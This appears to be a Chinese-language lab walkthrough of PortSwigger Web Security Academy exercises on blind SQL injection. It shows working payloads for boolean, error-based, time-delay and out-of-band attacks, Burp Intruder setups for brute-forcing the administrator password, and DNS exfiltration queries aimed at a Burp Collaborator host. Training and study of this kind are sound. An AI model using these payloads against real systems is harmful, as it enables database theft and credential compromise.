\u7576\u61c9\u7528\u7a0b\u5f0f\u5bb9\u6613\u53d7\u5230 SQL \u6ce8\u5165\u653b\u64ca\uff0c\u4f46\u5176 HTTP \u56de\u61c9\u4e0d\u5305\u542b\u76f8\u95dc SQL \u67e5\u8a62\u7684\u7d50\u679c\u6216\u4efb\u4f55\u8cc7\u6599\u5eab\u932f\u8aa4\u7684\u8a73\u7d30\u8cc7\u8a0a\u6642\uff0c\u5c31\u6703\u767c\u751f SQL \u76f2\u6ce8\u3002<\/p>\n\n\n\n
<\/p>\n\n\n\n
\u6839\u64da\u6ce8\u5165\u7684\u689d\u4ef6\u89f8\u767c\u4e0d\u540c\u7684\u56de\u61c9\u4f86\u53d6\u5f97\u8cc7\u8a0a<\/p>\n\n\n\n
\u5047\u5982\u6b63\u5e38\u8acb\u6c42\u5982\u4e0b<\/p>\n\n\n\n
GET \/ HTTP\/2\nHost: 0a1800d304f4172180218022007f00ae.web-security-academy.net\nCookie: TrackingId=u5YD3PapBcR4lN3e7Tj4\n...omit... <\/code><\/pre>\n\n\n\n\u4e0a\u8ff0\u8acb\u6c42\u6703\u8b8a\u6210sql\u8a9e\u6cd5\u5982\u4e0b<\/p>\n\n\n\n
SELECT TrackingId FROM TrackedUsers WHERE TrackingId = 'u5YD3PapBcR4lN3e7Tj4'<\/code><\/p>\n\n\n\n\u56e0\u6b64\u53ef\u4ee5\u4f9d\u5e8f\u6e2c\u8a66\u4ee5\u4e0b\u7684\u5167\u5bb9<\/p>\n\n\n\n
Cookie: TrackingId=u5YD3PapBcR4lN3e7Tj4' AND '1'='1<\/mark>\nCookie: TrackingId=u5YD3PapBcR4lN3e7Tj4' AND '1'='2<\/mark><\/code><\/pre>\n\n\n\n\u7b2c\u4e00\u500b\u6ce8\u5165\u7684AND '1'='1<\/code>\u689d\u4ef6\u70ba true\uff0c\u986f\u793aWelcome back<\/p>\n\n\n\n\u7b2c\u4e8c\u500b\u6ce8\u5165\u7684AND '1'='2<\/code>\u689d\u4ef6\u70ba false\uff0c\u4e0d\u986f\u793aWelcome back<\/p>\n\n\n\n\u9019\u4f7f\u6211\u5011\u80fd\u5920\u78ba\u5b9a\u4efb\u4f55\u55ae\u4e00\u6ce8\u5165\u689d\u4ef6\u7684\u7b54\u6848\uff0c\u4e26\u4e00\u6b21\u63d0\u53d6\u4e00\u500b\u6578\u64da\uff0c\u53ef\u4ee5\u767c\u52d5\u76f2\u6ce8\u529f\u64ca<\/p>\n\n\n\n
<\/p>\n\n\n\n
\n- \u78ba\u8a8d\u662f\u5426\u6709\u8cc7\u6599\u8868user\uff0c\u5982\u679c\u70batrue\u8868\u793a\u5b58\u5728(\u8fd4\u56de\u6703\u986f\u793aWelcome back)<\/li>\n<\/ul>\n\n\n\n
##################### request #####################\nGET \/ HTTP\/2\nHost: 0a1800d304f4172180218022007f00ae.web-security-academy.net\nCookie: TrackingId=u5YD3PapBcR4lN3e7Tj4' AND (SELECT 'a' FROM users LIMIT 1)='a<\/mark>\n...omit...\n\n##################### response #####################\n...omit...\nWelcome back\n...omit...<\/code><\/pre>\n\n\n\n\n- \u78ba\u8a8d\u8cc7\u6599\u8868user\u662f\u5426\u6709administrator\uff0c\u4ee5\u4e0b\u8fd4\u56dewelcome back\u8868\u793a\u5b58\u5728<\/li>\n<\/ul>\n\n\n\n
GET \/ HTTP\/2\nHost: 0a1800d304f4172180218022007f00ae.web-security-academy.net\nCookie: TrackingId=u5YD3PapBcR4lN3e7Tj4' AND (SELECT 'a' FROM users WHERE username='administrator')='a<\/mark>\n...omit...<\/code><\/pre>\n\n\n\n\n- \u78ba\u8a8dadministrator\u5bc6\u78bc\u9577\u5ea6\uff0c\u4f7f\u7528
intruder<\/code>\u7684snippper<\/code>\u6e2c\u8a66\u4ee5\u4e0b<\/li>\n<\/ul>\n\n\n\nGET \/ HTTP\/2\nHost: 0a1800d304f4172180218022007f00ae.web-security-academy.net\nCookie: TrackingId=u5YD3PapBcR4lN3e7Tj4' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)>\u00a7\u00a7)='a<\/mark>\n...omit...<\/code><\/pre>\n\n\n\npayload1\u7bc4\u570d\u5f9e1\u8a66\u523020\uff0c\u5982\u679c\u7522\u751ffalse\uff0c\u8868\u793a\u9577\u5ea6\u70ba\u4e0a\u4e00\u500b\u6578\u5b57<\/p>\n\n\n\n
\n- \u78ba\u8a8d\u9577\u5ea6\u70ba10\u5f8c\uff0c\u4f7f\u7528
intruder<\/code>\u7684cluster bomb<\/code>\u6e2c\u8a66\u4ee5\u4e0b<\/li>\n<\/ul>\n\n\n\nGET \/ HTTP\/2\nHost: 0a1800d304f4172180218022007f00ae.web-security-academy.net\nCookie: TrackingId=u5YD3PapBcR4lN3e7Tj4' AND (SELECT SUBSTRING(password,\u00a7\u00a7,1) FROM users WHERE username='administrator')='\u00a7\u00a7<\/mark>\n...omit...<\/code><\/pre>\n\n\n\npayload1\u7bc4\u570d\u70ba1-20\uff0cpayload2\u7bc4\u570d\u70baa-zA-Z0-9<\/p>\n\n\n\n
\u4e26\u4e14\u5728settings\/GREP-Match<\/code>\u8a2d\u5b9a\u53ea\u986f\u793a\u8fd4\u56de\u5167\u5bb9\u542bWelcome back<\/code>\u7684\u7d50\u679c<\/p>\n\n\n\n\u6700\u5f8c\u5c31\u80fd\u770b\u5230administrator\u7684\u5bc6\u78bc<\/p>\n\n\n\n
Lab: Blind SQL injection with conditional responses<\/p>\n\n\n\n
<\/p>\n\n\n\n
<\/p>\n\n\n\n
<\/p>\n\n\n\n
Error-based SQL injection<\/h2>\n\n\n\n
\u57fa\u65bc\u932f\u8aa4\u7684 SQL \u6ce8\u5165\u662f\u6307\u4f7f\u7528\u932f\u8aa4\u8a0a\u606f\u63a8\u65b7\u8cc7\u6599\u7684\u60c5\u6cc1<\/p>\n\n\n\n
<\/p>\n\n\n\n
\u900f\u904e\u89f8\u767c\u689d\u4ef6\u932f\u8aa4\u4f86\u5229\u7528 SQL \u76f2\u6ce8<\/h3>\n\n\n\n
\u5404\u6578\u64da\u5eab\u5e38\u898b\u8a9e\u6cd5\u53ef\u53c3\u8003\u5982\u4e0b<\/p>\n\n\n\nOracle<\/th> SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN TO_CHAR(1\/0) ELSE NULL END FROM dual<\/code><\/td><\/tr>Microsoft<\/th> SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 1\/0 ELSE NULL END<\/code><\/td><\/tr>PostgreSQL<\/th> 1 = (SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 1\/(SELECT 0) ELSE NULL END)<\/code><\/td><\/tr>MySQL<\/th> SELECT IF(YOUR-CONDITION-HERE,(SELECT table_name FROM information_schema.tables),'a')<\/code><\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<\/p>\n\n\n\n
\u5148\u7528\u6709\u6548\u7684 SQL \u8a9e\u6cd5\u6e2c\u8a66<\/p>\n\n\n\n
Cookie: TrackingId=u5YD3PapB'||(SELECT '')||'<\/mark>\nCookie: TrackingId=u5YD3PapB'||(SELECT '' FROM dual)||'<\/mark><\/code><\/pre>\n\n\n\n\u7b2c\u4e00\u500b\u986f\u793a\u70ba\u7121\u6548\uff0c\u7b2c\u4e8c\u500b\u6c92\u6709\u6536\u5230\u932f\u8aa4\uff0c\u9019\u8868\u793a\u76ee\u6a19\u4f7f\u7528oracle\u6578\u64da\u5eab<\/p>\n\n\n\n
\u4f7f\u7528oracle\u8a9e\u6cd5\u5728\u505a\u4e00\u6b21\u9a57\u8b49<\/p>\n\n\n\n
Cookie: TrackingId=u5YD3PapB'||(SELECT '' FROM not-a-real-table)||'<\/mark>\nCookie: TrackingId=u5YD3PapB'||(SELECT '' FROM users WHERE ROWNUM = 1)||'<\/mark><\/code><\/pre>\n\n\n\n\u7b2c\u4e00\u500b\u70ba\u932f\u8aa4\u8a9e\u6cd5\u6240\u4ee5\u56de\u50b3\u932f\u8aa4\u8a0a\u606f\uff0c\u7b2c\u4e8c\u500b\u662f\u6b63\u78ba\u8a9e\u6cd5\u6240\u4ee5\u6c92\u56de\u50b3\u932f\u8aa4\u8a0a\u606f\uff0c\u56e0\u6b64\u78ba\u8a8d\u5b58\u5728error-base\u6f0f\u6d1e<\/p>\n\n\n\n
<\/p>\n\n\n\n
\u70ba\u4e86\u65b9\u4fbf\u653b\u64ca\u6642\u5224\u65b7\u689d\u4ef6\uff0c\u53ef\u4f7f\u7528CASE<\/code>\u8a9e\u53e5\u6e2c\u8a66\u5982\u4e0b\uff0c\u5982\u679c\u689d\u4ef6\u70batrue\uff0c\u5247\u8a08\u7b97\u4e00\u500b\u6703\u5f15\u767c\u932f\u8aa4\u7684\u8868\u9054\u5f0f1\/0<\/code>\u3000<\/p>\n\n\n\nCookie: TrackingId=u5YD3PapB'||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1\/0) ELSE '' END FROM dual)||'<\/mark>\nCookie: TrackingId=u5YD3PapB'||(SELECT CASE WHEN (1=2) THEN TO_CHAR(1\/0) ELSE '' END FROM dual)||'<\/mark><\/code><\/pre>\n\n\n\n\u7b2c\u4e00\u500b\u6ce8\u5165\u76841=1<\/code>\u689d\u4ef6\u70ba true\uff0c\u6703\u8fd4\u56de\u932f\u8aa4\u8a0a\u606f<\/p>\n\n\n\n\u7b2c\u4e8c\u500b\u6ce8\u5165\u76841=2<\/code>\u689d\u4ef6\u70ba false\uff0c\u4e0d\u8fd4\u56de\u932f\u8aa4\u8a0a\u606f<\/p>\n\n\n\n\u9019\u4f7f\u6211\u5011\u80fd\u5920\u78ba\u5b9a\u4efb\u4f55\u55ae\u4e00\u6ce8\u5165\u689d\u4ef6\u7684\u7b54\u6848\uff0c\u4e26\u4e00\u6b21\u63d0\u53d6\u4e00\u500b\u6578\u64da\uff0c\u53ef\u4ee5\u767c\u52d5\u76f2\u6ce8\u529f\u64ca<\/p>\n\n\n\n
<\/p>\n\n\n\n
\u78ba\u8a8d\u8cc7\u6599\u8868user\u662f\u5426\u6709administrator\uff0c\u5982\u679c\u8fd4\u56de\u932f\u8aa4\u8a0a\u606f\u8868\u793a\u5b58\u5728<\/p>\n\n\n\n
'||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1\/0) ELSE '' END FROM users WHERE username='administrator')||'<\/code><\/p>\n\n\n\n\u78ba\u8a8dadministrator\u5bc6\u78bc\u9577\u5ea6\uff0c\u4f7f\u7528intruder<\/code>\u7684snippper<\/code>\u6e2c\u8a66\u4ee5\u4e0b<\/p>\n\n\n\n'||(SELECT CASE WHEN LENGTH(password)>\u00a7\u00a7 THEN TO_CHAR(1\/0) ELSE '' END FROM users WHERE username='administrator')||'<\/code><\/p>\n\n\n\npayload1\u7bc4\u570d\u5f9e1\u8a66\u523020\uff0c\u5982\u679c\u7522\u751ffalse\uff0c\u8868\u793a\u9577\u5ea6\u70ba\u4e0a\u4e00\u500b\u6578\u5b57<\/p>\n\n\n\n
\u78ba\u8a8d\u9577\u5ea6\u70ba10\u5f8c\uff0c\u4f7f\u7528intruder<\/code>\u7684cluster bomb<\/code>\u6e2c\u8a66\u4ee5\u4e0b<\/p>\n\n\n\n'||(SELECT CASE WHEN SUBSTR(password,\u00a7\u00a7,1)='\u00a7\u00a7' THEN TO_CHAR(1\/0) ELSE '' END FROM users WHERE username='administrator')||'<\/code><\/pre>\n\n\n\npayload1\u7bc4\u570d\u70ba1-20\uff0cpayload2\u7bc4\u570d\u70baa-zA-Z0-9<\/p>\n\n\n\n
\u8dd1\u5b8c\u5f8c\u6536\u96c6\u8fd4\u56de\u5167\u5bb9\u70baStatus 500\u7684\u7d50\u679c\uff0c\u5c31\u662fadministrator\u7684\u5bc6\u78bc<\/p>\n\n\n\n
Lab: Blind SQL injection with conditional errors<\/p>\n\n\n\n
<\/p>\n\n\n\n
<\/p>\n\n\n\n
\u900f\u904e\u8a73\u7d30\u7684 SQL \u932f\u8aa4\u8a0a\u606f\u63d0\u53d6\u654f\u611f\u6578\u64da<\/h3>\n\n\n\n
\u8cc7\u6599\u5eab\u914d\u7f6e\u932f\u8aa4\u6709\u6642\u6703\u5c0e\u81f4\u8a73\u7d30\u7684\u932f\u8aa4\u8a0a\u606f\u3002\u9019\u4e9b\u53ef\u4ee5\u63d0\u4f9b\u5c0d\u653b\u64ca\u8005\u53ef\u80fd\u6709\u7528\u7684\u4fe1\u606f\u3002<\/p>\n\n\n\n
\u5404\u6578\u64da\u5eab\u5e38\u898b\u8a9e\u6cd5\u53ef\u53c3\u8003\u5982\u4e0b<\/p>\n\n\n\nMicrosoft<\/th> SELECT 'foo' WHERE 1 = (SELECT 'secret')
> Conversion failed when converting the varchar value 'secret' to data type int.<\/code><\/td><\/tr>PostgreSQL<\/th> SELECT CAST((SELECT password FROM users LIMIT 1) AS int)
> invalid input syntax for integer: \"secret\"<\/code><\/td><\/tr>MySQL<\/th> SELECT 'foo' WHERE 1=1 AND EXTRACTVALUE(1, CONCAT(0x5c, (SELECT 'secret')))
> XPATH syntax error: '\\secret'<\/code><\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<\/p>\n\n\n\n
\u4e0d\u77e5\u9053\u76ee\u6a19\u7db2\u7ad9\u662f\u5426\u6709\u5f31\u9ede\uff0c\u53ef\u5728TrackingId=zGrTIjAYYHHLJeAY<\/code>\u5f8c\u589e\u52a0'<\/code>\u5982\u4e0b\u505a\u6e2c\u8a66<\/p>\n\n\n\nGET \/ HTTP\/2\nHost: 0a1800d304f4172180218022007f00ae.web-security-academy.net\nCookie: TrackingId=zGrTIjAYYHHLJeAY'<\/mark>; session=EeTJK76cInY6604FSm566W8POJU6wYrT<\/code><\/pre>\n\n\n\n\u8fd4\u56de\u5b8c\u6574\u932f\u8aa4\u8a0a\u606f Unterminated string literal started at position 52 in SQL SELECT * FROM tracking WHERE id = 'zGrTIjAYYHHLJeAY''. Expected char<\/code><\/p>\n\n\n\n\u6539\u6e2c\u8a66'--<\/code>\u5982\u4e0b\uff0c\u4f46\u4e0d\u8fd4\u56de\u932f\u8aa4\u8a0a\u606f\uff0c\u8868\u793a\u8a9e\u6cd5\u6709\u6548\uff0c\u76ee\u6a19\u6709SQL\u6ce8\u5165\u5f31\u9ede<\/p>\n\n\n\nGET \/ HTTP\/2\nHost: 0a1800d304f4172180218022007f00ae.web-security-academy.net\nCookie: TrackingId=zGrTIjAYYHHLJeAY'--<\/mark>; session=EeTJK76cInY6604FSm566W8POJU6wYrT<\/code><\/pre>\n\n\n\n\u5617\u8a66\u4f7f\u7528cast\u6e2c\u8a66\u5982\u4e0b<\/p>\n\n\n\n
GET \/ HTTP\/2\nHost: 0a1800d304f4172180218022007f00ae.web-security-academy.net\nCookie: TrackingId=zGrTIjAYYHHLJeAY' AND CAST((SELECT 1) AS int)--<\/mark>; session=EeTJK76cInY6604FSm566W8POJU6wYrT<\/code><\/pre>\n\n\n\n\u8fd4\u56de ERROR: argument of AND must be type boolean, not type integer<\/code><\/p>\n\n\n\n\u589e\u52a01=\u89e3\u6c7atype integer\u554f\u984c\u5982\u4e0b <\/p>\n\n\n\n
GET \/ HTTP\/2\nHost: 0a1800d304f4172180218022007f00ae.web-security-academy.net\nCookie: TrackingId=zGrTIjAYYHHLJeAY' AND 1=CAST((SELECT 1) AS int)--<\/mark>; session=EeTJK76cInY6604FSm566W8POJU6wYrT<\/code><\/pre>\n\n\n\n\u78ba\u8a8d\u60a8\u4e0d\u518d\u6536\u5230\u932f\u8aa4\uff0c\u8868\u793a\u9019\u662f\u4e00\u500b\u6709\u6548\u7684\u67e5\u8a62\uff0c\u78ba\u8a8dcast\u80fd\u7528\uff0c\u53ef\u4ee5\u958b\u59cb\u5229\u7528\u8a72\u5f31\u9ede\u53d6\u5f97\u91cd\u8981\u4fe1\u606f<\/p>\n\n\n\n
<\/p>\n\n\n\n
\n- \u5617\u8a66\u5f9e\u8cc7\u6599\u5eab\u4e2d\u6aa2\u7d22\u4f7f\u7528\u8005\u540d\u7a31\uff0c\u50c5\u91dd\u5c0dTrackID\u5167\u5bb9\u4fee\u6539\u70ba<\/li>\n<\/ul>\n\n\n\n
zGrTIjAYYHHLJeAY' AND 1=CAST((SELECT username FROM users) AS int)--<\/code><\/p>\n\n\n\n\u4f46\u8fd4\u56deUnterminated string literal started at position 95 in SQL SELECT * FROM tracking WHERE id = 'zGrTIjAYYHHLJeAY' AND 1=CAST((SELECT username FROM users) AS'. Expected char<\/code><\/p>\n\n\n\n\n- \u67e5\u8a62\u73fe\u5728\u7531\u65bc\u5b57\u5143\u9650\u88fd\u800c\u88ab\u622a\u65b7\uff0c\u56e0\u6b64\u8abf\u6574\u8a9e\u6cd5\u8b93\u5b57\u6578\u6e1b\u5c11\uff0c\u5982\u4e0b<\/li>\n<\/ul>\n\n\n\n
' AND 1=CAST((SELECT username FROM users) AS int)--<\/code><\/p>\n\n\n\n\u8fd4\u56deERROR: more than one row returned by a subquery used as an expression<\/code><\/p>\n\n\n\n\n- \u6839\u64da\u932f\u8aa4\u8a0a\u606f\uff0c\u6539\u70ba\u9650\u5236\u53ea\u67e5\u4e00\u7b46<\/li>\n<\/ul>\n\n\n\n
' AND 1=CAST((SELECT username FROM users LIMIT 1) AS int)--<\/code><\/p>\n\n\n\n\u8fd4\u56deERROR: invalid input syntax for type integer: \"administrator\"<\/code><\/p>\n\n\n\n\n- \u6839\u64da\u932f\u8aa4\u8a0a\u606f\u78ba\u8a8d\u5e33\u865f\u70baadministrator\uff0c\u73fe\u5728\u67e5\u5bc6\u78bc<\/li>\n<\/ul>\n\n\n\n
' AND 1=CAST((SELECT password FROM users LIMIT 1) AS int)--<\/code><\/p>\n\n\n\n\u8fd4\u56de ERROR: invalid input syntax for type integer: \"v4dz72zvg8kkhi72ndh1\"<\/code><\/p>\n\n\n\n\u5f97\u5230administrator\u7684\u5bc6\u78bc\u70bav4dz72zvg8kkhi72ndh1<\/p>\n\n\n\n
Lab: Visible error-based SQL injection<\/p>\n\n\n\n
<\/p>\n\n\n\n
<\/p>\n\n\n\n
Time-based blind SQL injection<\/h2>\n\n\n\n
\u6ce8\u5165\u689d\u4ef6\u662f\u771f\u662f\u5047\u4f86\u89f8\u767c\u6642\u9593\u5ef6\u9072\u4ee5\u505a\u5224\u65b7<\/p>\n\n\n\n
\u5404\u6578\u64da\u5eabTime delays\u8a9e\u6cd5\u5982\u4e0b<\/p>\n\n\n\nOracle<\/th> dbms_pipe.receive_message(('a'),10)<\/code><\/td><\/tr>Microsoft<\/th> WAITFOR DELAY '0:0:10'<\/code><\/td><\/tr>PostgreSQL<\/th> SELECT pg_sleep(10)<\/code><\/td><\/tr>MySQL<\/th> SELECT SLEEP(10)<\/code><\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n\u4f8b\u5982\uff0c\u76ee\u6a19\u7db2\u7ad9\u7528postgresql\uff0c\u53ef\u4ee5\u5728\u6709\u6f0f\u6d1e\u7684\u5730\u65b9\u63d2\u5165'||pg_sleep(10)--<\/code>\uff0c\u8b93\u76ee\u6a19\u616210\u79d2<\/p>\n\n\n\nGET \/ HTTP\/2\nHost: 0a1800d304f4172180218022007f00ae.web-security-academy.net\nCookie: TrackingId=zGrTIjAYYHHLJeAY'||pg_sleep(10)--<\/mark><\/code><\/pre>\n\n\n\nLab: Blind SQL injection with time delays<\/p>\n\n\n\n
<\/p>\n\n\n\n
\u5982\u679c\u8981\u589e\u52a0\u689d\u4ef6\uff0c\u5404\u6578\u64da\u5eab\u7684\u8a9e\u6cd5\u53ef\u53c3\u8003\u4ee5\u4e0b<\/p>\n\n\n\nOracle<\/th> SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 'a'||dbms_pipe.receive_message(('a'),10) ELSE NULL END FROM dual<\/code><\/td><\/tr>Microsoft<\/th> IF (YOUR-CONDITION-HERE) WAITFOR DELAY '0:0:10'<\/code><\/td><\/tr>PostgreSQL<\/th> SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN pg_sleep(10) ELSE pg_sleep(0) END<\/code><\/td><\/tr>MySQL<\/th> SELECT IF(YOUR-CONDITION-HERE,SLEEP(10),'a')<\/code><\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<\/p>\n\n\n\n
\u5728Microsoft SQL Server\uff0c\u53ef\u4ee5\u4f7f\u7528\u4ee5\u4e0b\u65b9\u5f0f\u5224\u65b7\uff0c\u5982\u679c\u689d\u4ef6\u6210\u7acb\u5c31\u6703\u616210\u6162\uff0c\u5c31\u50cf\u7b2c2\u500b<\/p>\n\n\n\n
Cookie: TrackingId=x'; IF (1=2) WAITFOR DELAY '0:0:10'--<\/mark>\nCookie: TrackingId=x'; IF (1=1) WAITFOR DELAY '0:0:10'--<\/mark><\/code><\/pre>\n\n\n\n\u5728Microsoft SQL Server\uff0c\u731c\u6e2cadministrator\u7684\u5bc6\u78bc\uff0c\u5404\u5225\u5b57\u5143\u731c\u5c0d\u6703\u616210\u79d2<\/p>\n\n\n\n
Cookie: TrackingId=x'; IF (SELECT COUNT(Username) FROM Users WHERE Username = 'Administrator' AND SUBSTRING(Password, 1, 1) > 'm') = 1 WAITFOR DELAY '0:0:{delay}'--<\/mark><\/code><\/pre>\n\n\n\n<\/p>\n\n\n\n
\u5047\u5982\u76ee\u6a19\u7db2\u7ad9\u70bapostgresql\uff0c\u53ef\u4ee5\u5982\u4e0b\u64cd\u4f5c<\/p>\n\n\n\n
\u70ba\u4e86\u65b9\u4fbf\u653b\u64ca\u6642\u5224\u65b7\u689d\u4ef6\uff0c\u53ef\u4f7f\u7528CASE<\/code>\u8a9e\u53e5\u6e2c\u8a66\u5982\u4e0b\uff0c\u5982\u679c\u689d\u4ef6\u70batrue\uff0c\u5247\u56de\u8986\u6642\u9593\u616210\u79d2<\/p>\n\n\n\nCookie: TrackingId=x'%3BSELECT+CASE+WHEN+(1=1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END--<\/mark>\nCookie: TrackingId=x'%3BSELECT+CASE+WHEN+(1=2)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END--<\/mark><\/code><\/pre>\n\n\n\n\u7b2c\u4e00\u500b\u6ce8\u5165\u76841=1<\/code>\u689d\u4ef6\u70ba true\uff0c\u6703\u616210\u79d2<\/p>\n\n\n\n\u7b2c\u4e8c\u500b\u6ce8\u5165\u76841=2<\/code>\u689d\u4ef6\u70ba false\uff0c\u6b63\u5e38\u6642\u9593\u8fd4\u56de <\/p>\n\n\n\n\u9019\u4f7f\u6211\u5011\u80fd\u5920\u78ba\u5b9a\u4efb\u4f55\u55ae\u4e00\u6ce8\u5165\u689d\u4ef6\u7684\u7b54\u6848\uff0c\u53ef\u4ee5\u767c\u52d5\u76f2\u6ce8\u529f\u64ca<\/p>\n\n\n\n
\n- \u5224\u65b7administrator\u662f\u5426\u5b58\u5728<\/li>\n<\/ul>\n\n\n\n
'%3BSELECT+CASE+WHEN+(username='administrator')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--<\/code><\/p>\n\n\n\n\n- \u5224\u65b7administrator\u5bc6\u78bc\u9577\u5ea6<\/li>\n<\/ul>\n\n\n\n
'%3BSELECT+CASE+WHEN+(username='administrator'+AND+length(password)>20)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--<\/code><\/p>\n\n\n\n\u7531\u65bc\u5bc6\u78bc\u9577\u5ea620\u4ee5\u4e0b\u90fd\u616210\u79d2\uff0c\u4f46\u7531\u65bc\u6b64\u8a9e\u53e5\u6b63\u5e38\u8fd4\u56de\uff0c\u56e0\u6b64\u5bc6\u78bc\u9577\u5ea6\u70ba20<\/p>\n\n\n\n
\n- \u78ba\u8a8dadministrator\u5bc6\u78bc\u9577\u5ea6\u5f8c\uff0c\u4f7f\u7528
intruder<\/code>\u7684clusterbomb<\/code>\u6e2c\u8a66\u4ee5\u4e0b<\/li>\n<\/ul>\n\n\n\n'%3BSELECT+CASE+WHEN+(username='administrator'+AND+substring(password,\u00a7\u00a7,1)='\u00a7\u00a7')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--<\/code><\/p>\n\n\n\npayload1\u7bc4\u570d\u70ba1-20\uff0cpayload2\u7bc4\u570d\u70baa-zA-Z0-9<\/p>\n\n\n\n
\u628a\u6240\u6709\u616210\u79d2\u7684\u7d50\u679c\u6536\u96c6\u8d77\u4f86\uff0c\u5c31\u662f\u6b63\u78ba\u5bc6\u78bc<\/p>\n\n\n\n
Lab: Blind SQL injection with time delays and information retrieval<\/p>\n\n\n\n
<\/p>\n\n\n\n
<\/p>\n\n\n\n
OAST <\/h2>\n\n\n\n
\u7576\u6578\u64da\u5eab\u7684\u4e0d\u50b3\u56de\u4efb\u4f55\u8cc7\u6599\u3001\u4e5f\u4e0d\u6703\u50b3\u56de\u932f\u8aa4\u8a0a\u606f\uff0c\u7121\u6cd5\u4f7f\u7528\u6642\u9593\u5ef6\u9072\u6642\uff0c\u53ef\u4ee5\u7528out-of-band\u65b9\u6cd5\uff0c\u5176\u4e2d\u6700\u5e38\u642d\u914d\u7684\u662fDNS\u3002<\/p>\n\n\n\n
\u5404\u6578\u64da\u5eab\u7684\u5c0d\u5916\u67e5\u8a62dns\u8a9e\u6cd5\u53ef\u53c3\u8003\u4ee5\u4e0b<\/p>\n\n\n\nOracle<\/th> \u5982\u679c\u9084\u6c92\u4fee\u88dcXXE\u6f0f\u6d1e\uff0c\u53ef\u4ee5\u4f7f\u7528\u4ee5\u4e0b\u8a9e\u6cd5
SELECT EXTRACTVALUE(xmltype('<?xml version=\"1.0\" encoding=\"UTF-8\"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM \"http:\/\/BURP-COLLABORATOR-SUBDOMAIN\/\"> %remote;]>'),'\/l') FROM dual<\/code>
\u5982\u679cXXE\u6f0f\u6d1e\u5df1\u4fee\u88dc\uff0c\u53ef\u5617\u8a66\u4f7f\u7528\u4ee5\u4e0b\u8a9e\u6cd5
SELECT UTL_INADDR.get_host_address('BURP-COLLABORATOR-SUBDOMAIN')<\/code><\/td><\/tr>Microsoft<\/th> exec master..xp_dirtree '\/\/BURP-COLLABORATOR-SUBDOMAIN\/a'<\/code><\/td><\/tr>PostgreSQL<\/th> copy (SELECT '') to program 'nslookup BURP-COLLABORATOR-SUBDOMAIN'<\/code><\/td><\/tr>MySQL<\/th> \u4ee5\u4e0b\u8a9e\u6cd5\u53ea\u80fd\u7528\u5728windo0ws\u5e73\u53f0
LOAD_FILE('\\\\\\\\BURP-COLLABORATOR-SUBDOMAIN\\\\a')<\/code>
SELECT ... INTO OUTFILE '\\\\\\\\BURP-COLLABORATOR-SUBDOMAIN\\a'<\/code><\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<\/p>\n\n\n\n
Microsoft SQL Server \u53ef\u7528\u4ee5\u4e0b\u8a9e\u6cd5\u5728\u6307\u5b9a\u7db2\u57df\u9032\u884cdns\u5c0b\u627e<\/p>\n\n\n\n
GET \/ HTTP\/2\nHost: 0a1800d304f4172180218022007f00ae.web-security-academy.net\nCookie: TrackingId=x'; exec master..xp_dirtree '\/\/0efdymgw1o5w9inae8mg4dfrgim9ay.burpcollaborator.net\/a'--<\/mark><\/code><\/pre>\n\n\n\nORACLE\u53ef\u7528\u4ee5\u4e0b\u8a9e\u6cd5\u5728\u6307\u5b9a\u7db2\u57df\u9032\u884cdns\u5c0b\u627e<\/p>\n\n\n\n
GET \/ HTTP\/2\nHost: 0a1800d304f4172180218022007f00ae.web-security-academy.net\nCookie: TrackingId=x'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d\"1.0\"+encoding%3d\"UTF-8\"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+\"http%3a\/\/BURP-COLLABORATOR-SUBDOMAIN\/\">+%25remote%3b]>'),'\/l')+FROM+dual--<\/mark><\/code><\/pre>\n\n\n\nLab: Blind SQL injection with out-of-band interaction<\/p>\n\n\n\n
<\/p>\n\n\n\n
\u9664\u6b64\u4e4b\u5916\uff0c\u4e5f\u53ef\u4ee5\u4f7f\u7528\u65b9\u5f0f\u642d\u914dDNS\u5c07\u8cc7\u6599\u5916\u50b3\uff0c\u5404\u6578\u64da\u5eab\u8a9e\u6cd5\u53c3\u8003\u5982\u4e0b<\/p>\n\n\n\nOracle<\/th> SELECT EXTRACTVALUE(xmltype('<?xml version=\"1.0\" encoding=\"UTF-8\"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM \"http:\/\/'||(SELECT YOUR-QUERY-HERE)||'.BURP-COLLABORATOR-SUBDOMAIN\/\"> %remote;]>'),'\/l') FROM dual<\/code><\/td><\/tr>Microsoft<\/th> declare @p varchar(1024);set @p=(SELECT YOUR-QUERY-HERE);exec('master..xp_dirtree \"\/\/'+@p+'.BURP-COLLABORATOR-SUBDOMAIN\/a\"')<\/code><\/td><\/tr>PostgreSQL<\/th> create OR replace function f() returns void as $$
declare c text;
declare p text;
begin
SELECT into p (SELECT YOUR-QUERY-HERE);
c := 'copy (SELECT '''') to program ''nslookup '||p||'.BURP-COLLABORATOR-SUBDOMAIN''';
execute c;
END;
$$ language plpgsql security definer;
SELECT f();<\/code><\/td><\/tr>MySQL<\/th> \u4ee5\u4e0b\u8a9e\u6cd5\u53ea\u80fd\u7528\u5728windows\u5e73\u53f0
SELECT YOUR-QUERY-HERE INTO OUTFILE '\\\\\\\\BURP-COLLABORATOR-SUBDOMAIN\\a'<\/code><\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<\/p>\n\n\n\n
